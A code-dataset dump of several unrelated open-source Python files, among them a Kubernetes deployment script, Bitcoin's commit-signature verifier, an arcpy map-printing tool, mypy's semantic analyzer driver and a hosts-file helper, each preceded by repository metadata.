return 0
def setup_and_build_request_worker_status(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_response=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def getresult(self, output_obj):
if constants.direct_test_mode == "listener":
listener_instance = ListenerImpl()
response = listener_instance.work_order_get_result(output_obj)
else:
sdk_instance = SDKImpl()
response = sdk_instance.work_order_get_result(output_obj)
return response
| 38.009615 | 74 | 0.676448 |
baddc62992d36e34d77f32baa80ce4dd7555d0e0 | 11,407 | py | Python | deployment/deploy-env.py | edoburu/demo.django-fluent.org | 10556eb383849fb20b8c6958d87c4b9f94085af2 | ["CC-BY-3.0"] | 24 | 2016-09-09T02:54:18.000Z | 2021-02-28T05:35:01.000Z | deployment/deploy-env.py | edoburu/demo.django-fluent.org | 10556eb383849fb20b8c6958d87c4b9f94085af2 | ["CC-BY-3.0"] | 288 | 2017-04-13T16:00:23.000Z | 2022-01-06T13:48:02.000Z | deployment/deploy-env.py | edoburu/demo.django-fluent.org | 10556eb383849fb20b8c6958d87c4b9f94085af2 | ["CC-BY-3.0"] | 5 | 2017-03-20T10:37:59.000Z | 2020-07-28T15:44:08.000Z |
#!/usr/bin/env python3
import atexit
import json
import os
import sys
from http.client import HTTPResponse
from tempfile import TemporaryDirectory
from ssl import SSLError
from typing import cast
from urllib.error import HTTPError
from urllib.request import urlopen, Request
from time import sleep
import argparse
import subprocess
from configparser import ConfigParser
# Brief implementation (based on termcolor / django's supports_color())
has_colors = hasattr(sys.stdout, "isatty") and sys.stdout.isatty()
GREEN = "\033[32m" if has_colors else ""
RESET = "\033[0m" if has_colors else ""
STATUS_RESOURCES = (
"pods",
"jobs",
"services",
"deployments",
"persistentvolumeclaims",
"configmaps",
"secrets",
"ingress",
)
def main():
os.chdir(os.path.dirname(__file__))
config = ConfigParser()
config.read("deploy-env.ini")
parser = argparse.ArgumentParser(
description="" "Deploy to a Kubernetes cluster using kustomize.\n",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"environment",
metavar="environment",
choices=config.sections(),
help="Environment name, as section in deploy-env.ini",
)
parser.add_argument(
"--dry-run", action="store_true", help="Output what would be deployed"
)
parser.add_argument(
"--server-dry-run",
action="store_true",
help="Only check whether the server would accept the YAML",
)
parser.add_argument(
"images",
metavar="image",
nargs="*",
help="Image substitution to deploy (format: name=registry/name:tag)",
)
parser.add_argument(
"--wait-for",
help="Text to expect at the healthcheck endpoint to detect a successful deployment.",
)
args = parser.parse_args()
# Read the INI file, start deployment
settings = config[args.environment]
try:
start_deployment(
settings,
images=args.images,
dry_run=args.dry_run,
server_dry_run=args.server_dry_run,
wait_for=args.wait_for,
)
except subprocess.CalledProcessError as e:
print(str(e), file=sys.stderr)
exit(e.returncode)
def start_deployment(
settings, images=None, dry_run=False, server_dry_run=False, wait_for=None
):
"""Perform the complete deployment"""
try:
release_name = settings["name"]
namespace = settings["namespace"]
label_selector = settings["labels"]
kustomize = settings["kustomize"]
healthcheck = settings["healthcheck"]
job = settings.get("job")
except KeyError:
print("Missing settings in INI file!", file=sys.stderr)
exit(1)
return # for pycharm
# Set the image
if images:
kustomize = _create_tmp_customize(
bases=[kustomize], prefix=kustomize.replace(os.path.sep, "-") + "-"
)
subprocess.run(
["kustomize", "edit", "set", "image"] + images, cwd=kustomize, check=True
)
# Generate the yaml contents. As this is reused several times,
# there is no need to setup pipes with subprocess.Popen
yaml_data = subprocess.run(
["kustomize", "build", kustomize, "--reorder", "none"],
stdout=subprocess.PIPE,
check=True,
).stdout
if dry_run:
print(yaml_data.decode())
if not server_dry_run:
return
# Remove old job
if job:
print(green("Removing old job {} from {}:".format(job, namespace)), flush=True)
delete_resources(namespace, 'job', job)
print("")
# Validate the kustomize output against the API server
# This checks whether the deployment would break (e.g. due to immutable fields)
print(green("Validating yaml with server-dry-run:"), flush=True)
subprocess.run(
["kubectl", "apply", "-f", "-", "--server-dry-run"], input=yaml_data, check=True
)
print("")
# Fetch previous configuration that we applied to the server.
# old_yaml_data = get_previous_release(yaml_data)
# Apply new yaml config
# The "kustomize build | kubectl apply -f -" approach allows to use kustomize 2.1,
# where as "kubectl apply --kustomize" uses kustomize 2.0 in kubectl 1.14.
print(green("Deploying {} to {}:".format(release_name, namespace)), flush=True)
subprocess.run(
["kubectl", "apply", "-f", "-", "--namespace", namespace, "--record"],
input=yaml_data,
check=True,
)
if server_dry_run:
return
# Show progress
sleep(1)
print("")
print(green("Objects created in {}:".format(namespace)), flush=True)
show_kube_resources(namespace, label_selector=label_selector)
# Wait for the deployment to come up. There are many reasons why a deployment fails:
# - ingress config invalid
# - service config invalid
# - missing priorityclasses, secrets, etc..
# - image pull issues
# - crashing containers due to wrong db credentials or resource limits.
#
# These can't be all accounted for, but testing for a healthcheck to return
# the latest git hash is a pretty close to catch all of these.
try:
wait_until_healthy(
healthcheck, release_name=release_name, expected_data=wait_for
)
except KeyboardInterrupt:
print("Aborted")
exit(1)
except OSError as e:
print("Deployment failed: {e}".format(e=e))
exit(1)
# if old_yaml_data:
# perform_rollback(old_yaml_data)
# print("Performing rollback")
# subprocess.run(
# ["kubectl", "apply", "-f", "-"],
# input=old_yaml_data,
# check=True,
# )
def delete_resources(namespace, *objects):
"""Delete a job"""
subprocess.run(
[
"kubectl",
"delete",
"job",
"--namespace",
namespace,
"--ignore-not-found",
"--wait=false",
"--now",
*objects,
],
check=True,
)
def purge_deployment(namespace, label_selector):
"""Delete all resources matching a label selector"""
delete_resources(namespace, '--selector', label_selector)
def show_kube_resources(namespace, label_selector):
"""Output the status of various objects.."""
# Fetch in a single command
all_output = subprocess.run(
[
"kubectl",
"get",
",".join(STATUS_RESOURCES),
"--namespace",
namespace,
"--selector",
label_selector,
"-o",
"wide",
],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
).stdout.decode()
# While printing, remove objecttype.foo/ prefix from names
header = None
for line in all_output.splitlines():
if line.startswith("NAME "):
header = line
elif line:
resource_type, line = line.split("/", 1)
if header:
print("\xa0") # for GKE
print(resource_type.split(".", 1)[0].upper())
print("NAME" + header[len(resource_type) + 5 :].replace(' ', '\xa0'))
header = None
print(line)
print("")
def get_previous_release(yaml_data):
"""Retrieve the previous released configuration"""
try:
result = subprocess.run(
["kubectl", "get", "-f", "-", "-o", "json"],
input=yaml_data,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
)
except subprocess.CalledProcessError as e:
# Ignore resources which are not found, see if there are any errors left.
errors = [
            line for line in e.stderr.decode().split("\n") if "(NotFound)" not in line
]
if errors:
print("\n".join(errors), file=sys.stderr)
exit(1)
return None # for PyCharm
else:
return None
return result.stdout
def green(text):
"""Apply text coloring"""
return "{}{}{}".format(GREEN, text, RESET) if GREEN else text
def _create_tmp_customize(bases, prefix=None):
"""Create a temporary """
temp_dir = TemporaryDirectory(prefix=prefix)
# kustomize only recognizes relative paths, so convert that
bases = [os.path.abspath(base) for base in bases]
bases = [os.path.relpath("/", base) + base for base in bases]
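    # Illustration: an absolute base like "/srv/app/k8s" becomes "../../../srv/app/k8s"
    # (one ".." per path component), since kustomize only accepts relative paths here.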
with open(
os.path.join(temp_dir.name, "kustomization.yaml"), "w", encoding="utf-8"
) as f:
f.write(
"apiVersion: kustomize.config.k8s.io/v1beta1\n"
"kind: Kustomization\n"
"\n"
"resources: {}\n".format(json.dumps(bases))
)
# Ensure a reference exists until the program exits.
atexit.register(temp_dir.cleanup)
return temp_dir.name
def wait_until_healthy(check_url, release_name, expected_data=None):
"""Wait until the URL endpoint returns the expected response."""
if expected_data:
print("Checking for", expected_data)
expected_data = expected_data.encode()
print("Checking deployment status at", check_url, end=" ", flush=True)
request = Request(check_url, headers={"User-Agent": "deploy-env"})
seen_regular = False
for i in range(120):
error = None
try:
response = cast(HTTPResponse, urlopen(request))
except OSError as e:
error = e
else:
received_data = response.read()
if not expected_data or expected_data in received_data:
print(
(
"got {status}\n"
"Successfully deployed {release_name} after {i} seconds"
).format(status=response.status, release_name=release_name, i=i)
)
return
elif not seen_regular:
print(
"got {status}, waiting for right content".format(
status=response.status
),
end="",
)
seen_regular = True
if error is not None and i >= 60:
if isinstance(error, HTTPError) and int(error.code) >= 400:
# Only allow 400/401/403/500/503 for a while, as it could be
# caused by a configuration error of the previous deployment.
raise TimeoutError(
"Still receiving HTTP {code} after {i} seconds".format(
code=error.code, i=i
)
) from None
elif isinstance(error, SSLError):
raise TimeoutError(
"Still receiving SSL errors after {i} seconds: {e}".format(
e=error, i=i
)
) from None
elif seen_regular:
raise IOError(
"Got error with new configuration after {i} seconds: {e}".format(
e=error, i=i
)
) from None
print(".", end="", flush=True)
sleep(1)
raise TimeoutError("Deployment still isn't online!")
if __name__ == "__main__":
main()
| 31.252055
| 93
| 0.578855
|
1bc28457ad973bd55a7ac34f6f3584473063b3f1
| 7,877
|
py
|
Python
|
contrib/verify-commits/verify-commits.py
|
SumExchange/sumcoin
|
59b8e657027b0df9b0da44e5d48c1877621f65ba
|
[
"MIT"
] | 1
|
2020-05-17T09:44:17.000Z
|
2020-05-17T09:44:17.000Z
|
contrib/verify-commits/verify-commits.py
|
SumExchange/sumcoin
|
59b8e657027b0df9b0da44e5d48c1877621f65ba
|
[
"MIT"
] | null | null | null |
contrib/verify-commits/verify-commits.py
|
SumExchange/sumcoin
|
59b8e657027b0df9b0da44e5d48c1877621f65ba
|
[
"MIT"
] | 3
|
2020-09-29T04:19:41.000Z
|
2021-02-08T22:32:01.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Verify commits against a trusted keys list."""
import argparse
import hashlib
import os
import subprocess
import sys
import time
GIT = os.getenv('GIT', 'git')
def tree_sha512sum(commit='HEAD'):
"""Calculate the Tree-sha512 for the commit.
This is copied from github-merge.py."""
# request metadata for entire tree, recursively
files = []
blob_by_name = {}
for line in subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', commit]).splitlines():
name_sep = line.index(b'\t')
metadata = line[:name_sep].split() # perms, 'blob', blobid
assert metadata[1] == b'blob'
name = line[name_sep + 1:]
files.append(name)
blob_by_name[name] = metadata[2]
files.sort()
# open connection to git-cat-file in batch mode to request data for all blobs
# this is much faster than launching it per file
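    # The batch protocol is line-oriented: we write "<blobid>\n" per request and read
    # back a "<blobid> blob <size>" header, followed by <size> bytes of content and a
    # trailing newline (parsed below).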
p = subprocess.Popen([GIT, 'cat-file', '--batch'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
overall = hashlib.sha512()
for f in files:
blob = blob_by_name[f]
# request blob
p.stdin.write(blob + b'\n')
p.stdin.flush()
# read header: blob, "blob", size
reply = p.stdout.readline().split()
assert reply[0] == blob and reply[1] == b'blob'
size = int(reply[2])
# hash the blob data
intern = hashlib.sha512()
ptr = 0
while ptr < size:
bs = min(65536, size - ptr)
piece = p.stdout.read(bs)
if len(piece) == bs:
intern.update(piece)
else:
raise IOError('Premature EOF reading git cat-file output')
ptr += bs
dig = intern.hexdigest()
assert p.stdout.read(1) == b'\n' # ignore LF that follows blob data
# update overall hash with file hash
overall.update(dig.encode("utf-8"))
overall.update(" ".encode("utf-8"))
overall.update(f)
overall.update("\n".encode("utf-8"))
p.stdin.close()
if p.wait():
raise IOError('Non-zero return value executing git cat-file')
return overall.hexdigest()
def main():
# Parse arguments
parser = argparse.ArgumentParser(usage='%(prog)s [options] [commit id]')
parser.add_argument('--disable-tree-check', action='store_false', dest='verify_tree', help='disable SHA-512 tree check')
parser.add_argument('--clean-merge', type=float, dest='clean_merge', default=float('inf'), help='Only check clean merge after <NUMBER> days ago (default: %(default)s)', metavar='NUMBER')
parser.add_argument('commit', nargs='?', default='HEAD', help='Check clean merge up to commit <commit>')
args = parser.parse_args()
# get directory of this program and read data files
dirname = os.path.dirname(os.path.abspath(__file__))
print("Using verify-commits data from " + dirname)
verified_root = open(dirname + "/trusted-git-root", "r", encoding="utf8").read().splitlines()[0]
verified_sha512_root = open(dirname + "/trusted-sha512-root-commit", "r", encoding="utf8").read().splitlines()[0]
revsig_allowed = open(dirname + "/allow-revsig-commits", "r", encoding="utf-8").read().splitlines()
unclean_merge_allowed = open(dirname + "/allow-unclean-merge-commits", "r", encoding="utf-8").read().splitlines()
incorrect_sha512_allowed = open(dirname + "/allow-incorrect-sha512-commits", "r", encoding="utf-8").read().splitlines()
# Set commit and branch and set variables
current_commit = args.commit
if ' ' in current_commit:
print("Commit must not contain spaces", file=sys.stderr)
sys.exit(1)
verify_tree = args.verify_tree
no_sha1 = True
prev_commit = ""
initial_commit = current_commit
branch = subprocess.check_output([GIT, 'show', '-s', '--format=%H', initial_commit], universal_newlines=True).splitlines()[0]
# Iterate through commits
while True:
if current_commit == verified_root:
print('There is a valid path from "{}" to {} where all commits are signed!'.format(initial_commit, verified_root))
sys.exit(0)
if current_commit == verified_sha512_root:
if verify_tree:
print("All Tree-SHA512s matched up to {}".format(verified_sha512_root), file=sys.stderr)
verify_tree = False
no_sha1 = False
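        # These environment variables are presumably read by the gpg.sh wrapper that is
        # passed to git for signature verification below.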
os.environ['BITCOIN_VERIFY_COMMITS_ALLOW_SHA1'] = "0" if no_sha1 else "1"
os.environ['BITCOIN_VERIFY_COMMITS_ALLOW_REVSIG'] = "1" if current_commit in revsig_allowed else "0"
# Check that the commit (and parents) was signed with a trusted key
if subprocess.call([GIT, '-c', 'gpg.program={}/gpg.sh'.format(dirname), 'verify-commit', current_commit], stdout=subprocess.DEVNULL):
if prev_commit != "":
print("No parent of {} was signed with a trusted key!".format(prev_commit), file=sys.stderr)
print("Parents are:", file=sys.stderr)
parents = subprocess.check_output([GIT, 'show', '-s', '--format=format:%P', prev_commit], universal_newlines=True).splitlines()[0].split(' ')
for parent in parents:
subprocess.call([GIT, 'show', '-s', parent], stdout=sys.stderr)
else:
print("{} was not signed with a trusted key!".format(current_commit), file=sys.stderr)
sys.exit(1)
# Check the Tree-SHA512
if (verify_tree or prev_commit == "") and current_commit not in incorrect_sha512_allowed:
tree_hash = tree_sha512sum(current_commit)
if ("Tree-SHA512: {}".format(tree_hash)) not in subprocess.check_output([GIT, 'show', '-s', '--format=format:%B', current_commit], universal_newlines=True).splitlines():
print("Tree-SHA512 did not match for commit " + current_commit, file=sys.stderr)
sys.exit(1)
# Merge commits should only have two parents
parents = subprocess.check_output([GIT, 'show', '-s', '--format=format:%P', current_commit], universal_newlines=True).splitlines()[0].split(' ')
if len(parents) > 2:
print("Commit {} is an octopus merge".format(current_commit), file=sys.stderr)
sys.exit(1)
# Check that the merge commit is clean
commit_time = int(subprocess.check_output([GIT, 'show', '-s', '--format=format:%ct', current_commit], universal_newlines=True).splitlines()[0])
check_merge = commit_time > time.time() - args.clean_merge * 24 * 60 * 60 # Only check commits in clean_merge days
allow_unclean = current_commit in unclean_merge_allowed
if len(parents) == 2 and check_merge and not allow_unclean:
current_tree = subprocess.check_output([GIT, 'show', '--format=%T', current_commit], universal_newlines=True).splitlines()[0]
subprocess.call([GIT, 'checkout', '--force', '--quiet', parents[0]])
subprocess.call([GIT, 'merge', '--no-ff', '--quiet', parents[1]], stdout=subprocess.DEVNULL)
recreated_tree = subprocess.check_output([GIT, 'show', '--format=format:%T', 'HEAD'], universal_newlines=True).splitlines()[0]
if current_tree != recreated_tree:
print("Merge commit {} is not clean".format(current_commit), file=sys.stderr)
subprocess.call([GIT, 'diff', current_commit])
subprocess.call([GIT, 'checkout', '--force', '--quiet', branch])
sys.exit(1)
subprocess.call([GIT, 'checkout', '--force', '--quiet', branch])
prev_commit = current_commit
current_commit = parents[0]
if __name__ == '__main__':
main()
| 50.49359
| 190
| 0.633109
|
9430aa4810cc826e9bf6148992ab4dc3f568f29a
| 2,797
|
py
|
Python
|
maps/Print.py
|
agrc/surface-water-quality
|
5454a3c36ea00aa59d1fc6358d78807caf71c811
|
[
"MIT"
] | 1
|
2019-11-25T07:19:33.000Z
|
2019-11-25T07:19:33.000Z
|
maps/Print.py
|
agrc/surface-water-quality
|
5454a3c36ea00aa59d1fc6358d78807caf71c811
|
[
"MIT"
] | 7
|
2015-01-16T16:34:49.000Z
|
2022-03-30T21:05:20.000Z
|
maps/Print.py
|
agrc/surface-water-quality
|
5454a3c36ea00aa59d1fc6358d78807caf71c811
|
[
"MIT"
] | null | null | null |
import arcpy
from json import loads
from os.path import join
import os
'''
GP Parameters
0 - baseMap: String - name of the cached service (e.g. 'Streets')
1 - extent: {xmin: Number, ymin: Number, xmax: Number, ymax: Number}
2 - selectedPolys: featureSet (schema is BlankPoly)
3 - selectedLines: featureSet (schema is BlankLine)
4 - attributes: String - the text that shows up at the bottom of the map
5 - outFile: String (output parameter, path to pdf file)
'''
# variables
cwd = os.path.dirname(os.path.realpath(__file__))
mxdPath = join(cwd, 'PrintTemplate.mxd')
outFileName = 'map.pdf'
scratch = arcpy.env.scratchFolder
outPDF = join(scratch, outFileName)
scratchGDB = join(scratch, 'scratch.gdb')
if arcpy.Exists(scratchGDB) is False:
arcpy.CreateFileGDB_management(scratch, 'scratch.gdb')
BlankPoly = join(scratchGDB, 'BlankPoly')
BlankLine = join(scratchGDB, 'BlankLine')
def scrub(parameter):
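    # arcpy passes '#' (or an empty string) for optional GP parameters left blank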
if parameter == '#' or not parameter:
return None
else:
return parameter
def addSelectedFeatures(features, targetFC, layerInd):
name = targetFC.split('\\')[-1]
arcpy.AddMessage('Adding selected %s' % name)
arcpy.CopyFeatures_management(features, targetFC)
lyr = lyrs[layerInd]
lyr.replaceDataSource(scratchGDB, 'FILEGDB_WORKSPACE', name)
lyr.visible = True
arcpy.AddMessage('Getting parameters')
baseMap = arcpy.GetParameterAsText(0)
extent = loads(arcpy.GetParameterAsText(1))
selectedPolys = scrub(arcpy.GetParameterAsText(2))
arcpy.AddMessage('selectedPolys: %s' % selectedPolys)
selectedLines = scrub(arcpy.GetParameterAsText(3))
attributes = scrub(arcpy.GetParameterAsText(4))
arcpy.AddMessage('Opening mxd')
mxd = arcpy.mapping.MapDocument(mxdPath)
arcpy.AddMessage('Displaying base map layer')
lyrs = arcpy.mapping.ListLayers(mxd)
for l in lyrs:
if l.name == baseMap:
l.visible = True
arcpy.AddMessage('Updating extent')
dataFrame = arcpy.mapping.ListDataFrames(mxd)[0]
mxdExtent = dataFrame.extent
mxdExtent.XMin = extent['xmin']
mxdExtent.YMin = extent['ymin']
mxdExtent.XMax = extent['xmax']
mxdExtent.YMax = extent['ymax']
dataFrame.extent = mxdExtent
if selectedPolys:
addSelectedFeatures(selectedPolys, BlankPoly, 1)
if selectedLines:
addSelectedFeatures(selectedLines, BlankLine, 0)
if attributes:
txt = arcpy.mapping.ListLayoutElements(mxd, 'TEXT_ELEMENT', 'attributes')[0]
arcpy.AddMessage('attributes: %s' % attributes)
arcpy.AddMessage('attributes.decode: %s' % attributes.decode('string-escape'))
txt.text = attributes.decode('string-escape')
arcpy.AddMessage('Exporting map to PDF')
arcpy.mapping.ExportToPDF(mxd, outPDF)
arcpy.SetParameterAsText(5, outPDF)
arcpy.AddMessage('Done.')
| 31.426966
| 83
| 0.720057
|
1424bd5b1df7525ba62fea5604e004f8ef3b151a
| 13,957
|
py
|
Python
|
mypy/newsemanal/semanal_main.py
|
phamnhatthe/mypy
|
892b8d85afb80c9833248f2a8acf1c65023e0cad
|
[
"PSF-2.0"
] | null | null | null |
mypy/newsemanal/semanal_main.py
|
phamnhatthe/mypy
|
892b8d85afb80c9833248f2a8acf1c65023e0cad
|
[
"PSF-2.0"
] | null | null | null |
mypy/newsemanal/semanal_main.py
|
phamnhatthe/mypy
|
892b8d85afb80c9833248f2a8acf1c65023e0cad
|
[
"PSF-2.0"
] | null | null | null |
"""Top-level logic for the new semantic analyzer.
The semantic analyzer binds names, resolves imports, detects various
special constructs that don't have dedicated AST nodes after parse
(such as 'cast' which looks like a call), and performs various simple
consistency checks.
Semantic analysis of each SCC (strongly connected component; import
cycle) is performed in one unit. Each module is analyzed as multiple
separate *targets*; the module top level is one target and each function
is a target. Nested functions are not separate targets, however. This is
mostly identical to targets used by mypy daemon (but classes aren't
targets in semantic analysis).
We first analyze each module top level in an SCC. If we encounter some
names that we can't bind because the target of the name may not have
been processed yet, we *defer* the current target for further
processing. Deferred targets will be analyzed additional times until
everything can be bound, or we reach a maximum number of iterations.
We keep track of a set of incomplete namespaces, i.e. namespaces that we
haven't finished populating yet. References to these namespaces cause a
deferral if they can't be satisfied. Initially every module in the SCC
will be incomplete.
"""
from typing import List, Tuple, Optional, Union, Callable
from mypy.nodes import (
MypyFile, TypeInfo, FuncDef, Decorator, OverloadedFuncDef
)
from mypy.newsemanal.semanal_typeargs import TypeArgumentAnalyzer
from mypy.state import strict_optional_set
from mypy.newsemanal.semanal import (
NewSemanticAnalyzer, apply_semantic_analyzer_patches, remove_imported_names_from_symtable
)
from mypy.newsemanal.semanal_classprop import calculate_class_abstract_status, calculate_class_vars
from mypy.errors import Errors
from mypy.newsemanal.semanal_infer import infer_decorator_signature_if_simple
from mypy.checker import FineGrainedDeferredNode
MYPY = False
if MYPY:
from mypy.build import Graph, State
Patches = List[Tuple[int, Callable[[], None]]]
# If we perform this many iterations, raise an exception since we are likely stuck.
MAX_ITERATIONS = 20
# Number of passes over core modules before going on to the rest of the builtin SCC.
CORE_WARMUP = 2
core_modules = ['typing', 'builtins', 'abc', 'collections']
def semantic_analysis_for_scc(graph: 'Graph', scc: List[str], errors: Errors) -> None:
"""Perform semantic analysis for all modules in a SCC (import cycle).
Assume that reachability analysis has already been performed.
"""
patches = [] # type: Patches
# Note that functions can't define new module-level attributes
# using 'global x', since module top levels are fully processed
# before functions. This limitation is unlikely to go away soon.
process_top_levels(graph, scc, patches)
process_functions(graph, scc, patches)
# We use patch callbacks to fix up things when we expect relatively few
# callbacks to be required.
apply_semantic_analyzer_patches(patches)
# This pass might need fallbacks calculated above.
check_type_arguments(graph, scc, errors)
calculate_class_properties(graph, scc, errors)
check_blockers(graph, scc)
# Clean-up builtins, so that TypeVar etc. are not accessible without importing.
if 'builtins' in scc:
cleanup_builtin_scc(graph['builtins'])
def cleanup_builtin_scc(state: 'State') -> None:
"""Remove imported names from builtins namespace.
This way names imported from typing in builtins.pyi aren't available
    by default (without importing them). We can only do this once the whole SCC
    has been processed, when the imported names are no longer needed for
    processing builtins.pyi itself.
"""
assert state.tree is not None
remove_imported_names_from_symtable(state.tree.names, 'builtins')
def process_selected_targets(state: 'State', nodes: List[FineGrainedDeferredNode],
graph: 'Graph', strip_patches: List[Callable[[], None]]) -> None:
"""Semantically analyze only selected nodes in a given module.
This essentially mirrors the logic of semantic_analysis_for_scc()
except that we process only some targets. This is used in fine grained
incremental mode, when propagating an update.
The strip_patches are additional patches that may be produced by aststrip.py to
re-introduce implicitly declared instance variables (attributes defined on self).
"""
patches = [] # type: Patches
if any(isinstance(n.node, MypyFile) for n in nodes):
# Process module top level first (if needed).
process_top_levels(graph, [state.id], patches)
analyzer = state.manager.new_semantic_analyzer
for n in nodes:
if isinstance(n.node, MypyFile):
# Already done above.
continue
process_top_level_function(analyzer, state, state.id,
n.node.fullname(), n.node, n.active_typeinfo, patches)
apply_semantic_analyzer_patches(patches)
for patch in strip_patches:
patch()
check_type_arguments_in_targets(nodes, state, state.manager.errors)
calculate_class_properties(graph, [state.id], state.manager.errors)
def process_top_levels(graph: 'Graph', scc: List[str], patches: Patches) -> None:
# Process top levels until everything has been bound.
# Initialize ASTs and symbol tables.
for id in scc:
state = graph[id]
assert state.tree is not None
state.manager.new_semantic_analyzer.prepare_file(state.tree)
# Initially all namespaces in the SCC are incomplete (well they are empty).
state.manager.incomplete_namespaces.update(scc)
worklist = scc[:]
# HACK: process core stuff first. This is mostly needed to support defining
# named tuples in builtin SCC.
if all(m in worklist for m in core_modules):
worklist += list(reversed(core_modules)) * CORE_WARMUP
final_iteration = False
iteration = 0
while worklist:
iteration += 1
if iteration > MAX_ITERATIONS:
state.manager.new_semantic_analyzer.report_hang()
break
if final_iteration:
# Give up. It's impossible to bind all names.
state.manager.incomplete_namespaces.clear()
all_deferred = [] # type: List[str]
any_progress = False
while worklist:
next_id = worklist.pop()
state = graph[next_id]
assert state.tree is not None
deferred, incomplete, progress = semantic_analyze_target(next_id, state,
state.tree,
None,
final_iteration,
patches)
all_deferred += deferred
any_progress = any_progress or progress
if not incomplete:
state.manager.incomplete_namespaces.discard(next_id)
if final_iteration:
assert not all_deferred, 'Must not defer during final iteration'
# Reverse to process the targets in the same order on every iteration. This avoids
# processing the same target twice in a row, which is inefficient.
worklist = list(reversed(all_deferred))
final_iteration = not any_progress
def process_functions(graph: 'Graph', scc: List[str], patches: Patches) -> None:
# Process functions.
for module in scc:
tree = graph[module].tree
assert tree is not None
analyzer = graph[module].manager.new_semantic_analyzer
targets = get_all_leaf_targets(tree)
for target, node, active_type in targets:
assert isinstance(node, (FuncDef, OverloadedFuncDef, Decorator))
process_top_level_function(analyzer,
graph[module],
module,
target,
node,
active_type,
patches)
def process_top_level_function(analyzer: 'NewSemanticAnalyzer',
state: 'State',
module: str,
target: str,
node: Union[FuncDef, OverloadedFuncDef, Decorator],
active_type: Optional[TypeInfo],
patches: Patches) -> None:
"""Analyze single top-level function or method.
Process the body of the function (including nested functions) again and again,
    until all names have been resolved (or the iteration limit is reached).
"""
# We need one more iteration after incomplete is False (e.g. to report errors, if any).
final_iteration = False
incomplete = True
# Start in the incomplete state (no missing names will be reported on first pass).
# Note that we use module name, since functions don't create qualified names.
deferred = [module]
analyzer.incomplete_namespaces.add(module)
iteration = 0
while deferred:
iteration += 1
if iteration == MAX_ITERATIONS:
analyzer.report_hang()
break
if not (deferred or incomplete) or final_iteration:
# OK, this is one last pass, now missing names will be reported.
analyzer.incomplete_namespaces.discard(module)
deferred, incomplete, progress = semantic_analyze_target(target, state, node, active_type,
final_iteration, patches)
if final_iteration:
assert not deferred, 'Must not defer during final iteration'
if not progress:
final_iteration = True
analyzer.incomplete_namespaces.discard(module)
# After semantic analysis is done, discard local namespaces
# to avoid memory hoarding.
analyzer.saved_locals.clear()
TargetInfo = Tuple[str, Union[MypyFile, FuncDef, OverloadedFuncDef, Decorator], Optional[TypeInfo]]
def get_all_leaf_targets(file: MypyFile) -> List[TargetInfo]:
"""Return all leaf targets in a symbol table (module-level and methods)."""
result = [] # type: List[TargetInfo]
for fullname, node, active_type in file.local_definitions():
if isinstance(node.node, (FuncDef, OverloadedFuncDef, Decorator)):
result.append((fullname, node.node, active_type))
return result
def semantic_analyze_target(target: str,
state: 'State',
node: Union[MypyFile, FuncDef, OverloadedFuncDef, Decorator],
active_type: Optional[TypeInfo],
final_iteration: bool,
patches: Patches) -> Tuple[List[str], bool, bool]:
"""Semantically analyze a single target.
Return tuple with these items:
- list of deferred targets
- was some definition incomplete
    - were any new names defined (or placeholders replaced)
"""
tree = state.tree
assert tree is not None
analyzer = state.manager.new_semantic_analyzer
# TODO: Move initialization to somewhere else
analyzer.global_decls = [set()]
analyzer.nonlocal_decls = [set()]
analyzer.globals = tree.names
analyzer.progress = False
with state.wrap_context(check_blockers=False):
with analyzer.file_context(file_node=tree,
fnam=tree.path,
options=state.options,
active_type=active_type):
refresh_node = node
if isinstance(refresh_node, Decorator):
# Decorator expressions will be processed as part of the module top level.
refresh_node = refresh_node.func
analyzer.refresh_partial(refresh_node, patches, final_iteration)
if isinstance(node, Decorator):
infer_decorator_signature_if_simple(node, analyzer)
if analyzer.deferred:
return [target], analyzer.incomplete, analyzer.progress
else:
return [], analyzer.incomplete, analyzer.progress
def check_type_arguments(graph: 'Graph', scc: List[str], errors: Errors) -> None:
for module in scc:
state = graph[module]
assert state.tree
analyzer = TypeArgumentAnalyzer(errors)
with state.wrap_context():
with strict_optional_set(state.options.strict_optional):
state.tree.accept(analyzer)
def check_type_arguments_in_targets(targets: List[FineGrainedDeferredNode], state: 'State',
errors: Errors) -> None:
"""Check type arguments against type variable bounds and restrictions.
This mirrors the logic in check_type_arguments() except that we process only
some targets. This is used in fine grained incremental mode.
"""
analyzer = TypeArgumentAnalyzer(errors)
with state.wrap_context():
with strict_optional_set(state.options.strict_optional):
for target in targets:
analyzer.recurse_into_functions = not isinstance(target.node, MypyFile)
target.node.accept(analyzer)
def calculate_class_properties(graph: 'Graph', scc: List[str], errors: Errors) -> None:
for module in scc:
tree = graph[module].tree
assert tree
# TODO: calculate properties also for classes nested in functions.
for _, node, _ in tree.local_definitions():
if isinstance(node.node, TypeInfo):
calculate_class_abstract_status(node.node, tree.is_stub, errors)
calculate_class_vars(node.node)
def check_blockers(graph: 'Graph', scc: List[str]) -> None:
for module in scc:
graph[module].check_blockers()
| 43.210526
| 99
| 0.658666
|
07c384c3de54747bab6d1cef9ba39e74b080410f
| 605
|
py
|
Python
|
sobotka/hosts_file_manager.py
|
looneym/sobotka
|
7df0f86b9c8115b6b81165df8e88b753a6156970
|
[
"MIT"
] | 2
|
2017-09-22T16:08:20.000Z
|
2019-04-16T08:57:43.000Z
|
sobotka/hosts_file_manager.py
|
looneym/sobotka
|
7df0f86b9c8115b6b81165df8e88b753a6156970
|
[
"MIT"
] | 8
|
2017-08-18T11:40:10.000Z
|
2017-11-01T09:10:25.000Z
|
sobotka/hosts_file_manager.py
|
looneym/sobotka
|
7df0f86b9c8115b6b81165df8e88b753a6156970
|
[
"MIT"
] | null | null | null |
from python_hosts import Hosts, HostsEntry
class HostsFileManager:
def __init__(self):
self.my_hosts = Hosts()
def add_entry(self, ip, name):
name = name + ".dev"
# just to be safe
self.remove_entry(ip, name)
new_entry = HostsEntry(entry_type='ipv4', address=ip, names=[name])
